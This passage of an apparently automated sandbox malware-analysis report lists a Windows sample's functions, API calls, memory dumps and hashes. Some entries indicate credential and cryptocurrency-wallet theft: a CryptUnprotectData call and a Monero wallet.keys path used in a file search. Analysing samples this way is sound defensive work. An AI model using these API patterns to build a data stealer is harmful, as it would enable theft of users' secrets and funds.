                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 3f4d1c226cdbe60ff46aa6c98ab278a1847d743c2a4e510ce8175c71231b2945
                                    • Instruction ID: f163a0e71ece57a72913ebf318a96b5938446a7d34376647467a8c06c4cef003
                                    • Opcode Fuzzy Hash: 3f4d1c226cdbe60ff46aa6c98ab278a1847d743c2a4e510ce8175c71231b2945
                                    • Instruction Fuzzy Hash: 8A11A4B4640208BFEB10CF64D895FAA77B5FB89710F208058FA159F384C7B5AA41DB50
                                    Function 00FF7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01000E00,00000000,?), ref: 00FF79B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF79B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,01000E00,00000000,?), ref: 00FF79C4
                                    • wsprintfA.USER32 ref: 00FF79F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: bd839b23afc163a9e54ddb8821657f266971cdf99408c196002fce945fa11a6e
                                    • Instruction ID: 1f479ed6bde6e72260484f094fe6937bdb60abd2864b753ffaf15fc3f243e697
                                    • Opcode Fuzzy Hash: bd839b23afc163a9e54ddb8821657f266971cdf99408c196002fce945fa11a6e
                                    • Instruction Fuzzy Hash: F81130B2904118ABCB24DFC9E949FBEB7F8FB4CB11F10411AF605A2684D7795940D771
                                    Function 00FF7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0180E2F0,00000000,?,01000E10,00000000,?,00000000,00000000), ref: 00FF7A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0180E2F0,00000000,?,01000E10,00000000,?,00000000,00000000,?), ref: 00FF7A7D
                                    • wsprintfA.USER32 ref: 00FF7AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 33d42b54024e4ce784574e67c36925fe59b04000604bf2c7089e1cc68598e7b5
                                    • Instruction ID: a903564c40836081a153a3a97c8782103d6704f8b9856def94304681179da816
                                    • Opcode Fuzzy Hash: 33d42b54024e4ce784574e67c36925fe59b04000604bf2c7089e1cc68598e7b5
                                    • Instruction Fuzzy Hash: 8A118EB1945218EBEB209F54EC49FA9B778FB44721F10439AFA0A936D0D7745A40CF51
                                    Function 013B179C Relevance: 5.3, Strings: 3, Instructions: 1599COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: "q_$78}$^R?J
                                    • API String ID: 0-4154499154
                                    • Opcode ID: d1b82606fd9dabf45d67702924e4b5e38a9c5d0f43a6e54eb579dc87b6f2ca40
                                    • Instruction ID: e33a004373122c426988b2c76541357ff37125e40fe1c8e7bc7cb9f123924dcc
                                    • Opcode Fuzzy Hash: d1b82606fd9dabf45d67702924e4b5e38a9c5d0f43a6e54eb579dc87b6f2ca40
                                    • Instruction Fuzzy Hash: C9B204F360C204AFE3046F2DEC8567ABBE9EF94320F1A493DE6C5C7744EA3558418696
                                    Function 013BDC46 Relevance: 4.7, Strings: 3, Instructions: 941COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3/j$8Ha~$:1_
                                    • API String ID: 0-489423431
                                    • Opcode ID: 240664dd73a539e034a3ff868b69cf676314376ada6ac15479a6de1dea245a3f
                                    • Instruction ID: f74cd0d8e2850eb6f2983fecc045d6f2506802e6af940953ddf1ae8f4b504adb
                                    • Opcode Fuzzy Hash: 240664dd73a539e034a3ff868b69cf676314376ada6ac15479a6de1dea245a3f
                                    • Instruction Fuzzy Hash: 96524AF360C2049FE7086E2DEC9577ABBD5EF94260F1A4A3DEAC5C3744E97598008693
                                    Function 00FF3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(00FFE118,00000000,00000001,00FFE108,00000000), ref: 00FF3758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00FF37B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: fde8c8fc9334a582a4a6f005358f8e7f6a52a17ca476ac01d950fa435ead91b5
                                    • Instruction ID: 51942c2f6f1c043262820412c0c55d1b7e64dbd0fbd9a219b6c6fda71ed97981
                                    • Opcode Fuzzy Hash: fde8c8fc9334a582a4a6f005358f8e7f6a52a17ca476ac01d950fa435ead91b5
                                    • Instruction Fuzzy Hash: 6B41F971A00A1CAFDB24DF58CC95BABB7B4BF48702F4051D8E609A72A0D775AE85CF50
                                    Function 00FE9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FE9B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FE9BA3
                                    • LocalFree.KERNEL32(?), ref: 00FE9BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 52979d9fc29d65bf67456c1da9a6f63e3ce5e532be75ddb9040dfbedfb404492
                                    • Instruction ID: e870fb8dbb28b82f4d1cf59d6ffb1aa0b6c438c35609869d3401d65e453ef21f
                                    • Opcode Fuzzy Hash: 52979d9fc29d65bf67456c1da9a6f63e3ce5e532be75ddb9040dfbedfb404492
                                    • Instruction Fuzzy Hash: 14110CB8A00209EFCB14DF94D989AAE77B5FF88300F104568E81597344D774AE50CF61
                                    Function 013BB8F5 Relevance: 4.1, Strings: 2, Instructions: 1634COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Psh$X]:
                                    • API String ID: 0-786825503
                                    • Opcode ID: 09863524944303c242584eeba4964f936c3c86054196d0ed42b9da290e40678c
                                    • Instruction ID: 4b66278655c2e3e37ea10537615e4f2a318598fb7b95218baba5e7b61755323a
                                    • Opcode Fuzzy Hash: 09863524944303c242584eeba4964f936c3c86054196d0ed42b9da290e40678c
                                    • Instruction Fuzzy Hash: CDB23BF3A082109FD300AE2DEC8567ABBE9EF94720F1A463DEAC4D7744E67558058793
                                    Function 013AC786 Relevance: 4.1, Strings: 2, Instructions: 1619COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: h*$o.s&
                                    • API String ID: 0-1761243478
                                    • Opcode ID: 409ac80282adb6ddf5d86a00b01b5106a1d59799972b29a3e3dac122be3beaf3
                                    • Instruction ID: ad40b85e114f6b6341e939a525bbd779092b40b8cecc007f1e6189d2ae4a83ce
                                    • Opcode Fuzzy Hash: 409ac80282adb6ddf5d86a00b01b5106a1d59799972b29a3e3dac122be3beaf3
                                    • Instruction Fuzzy Hash: DEB2F8F360C2049FE304AE2DEC4567AB7E9EF94720F1A893DE6C4C7744E63598058697
                                    Function 00FEF68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010015B8,01000D96), ref: 00FEF71E
                                    • StrCmpCA.SHLWAPI(?,010015BC), ref: 00FEF76F
                                    • StrCmpCA.SHLWAPI(?,010015C0), ref: 00FEF785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEFAB1
                                    • FindClose.KERNEL32(000000FF), ref: 00FEFAC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: a5fab3822850ce9dcba98df2f2988bcc247c180a572608d86250647d202ab0da
                                    • Instruction ID: 68e00fbbd2aba64aa5972e8a194fa1c746d8363eb56ea696b719333cec26c54b
                                    • Opcode Fuzzy Hash: a5fab3822850ce9dcba98df2f2988bcc247c180a572608d86250647d202ab0da
                                    • Instruction Fuzzy Hash: 031187B580014DABDB24FB60DC559FD7378AF10340F4082A9A61E575E2EF742B4AD792
                                    Function 013AA0A6 Relevance: .4, Instructions: 406COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a8b558f626a1c08cd308e72fb5498bb603b4bcd14f31e28718f679a208c60b64
                                    • Instruction ID: b60f9ff5ce466d6622981f79025f0a7f8fdafb39625c06392e18cee40094196f
                                    • Opcode Fuzzy Hash: a8b558f626a1c08cd308e72fb5498bb603b4bcd14f31e28718f679a208c60b64
                                    • Instruction Fuzzy Hash: D6D1A0F3A0C200AFE3046F19EC8176AF7E9EF94720F1A892DE6C4C3744E63598518796
                                    Function 01382F8B Relevance: .2, Instructions: 188COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
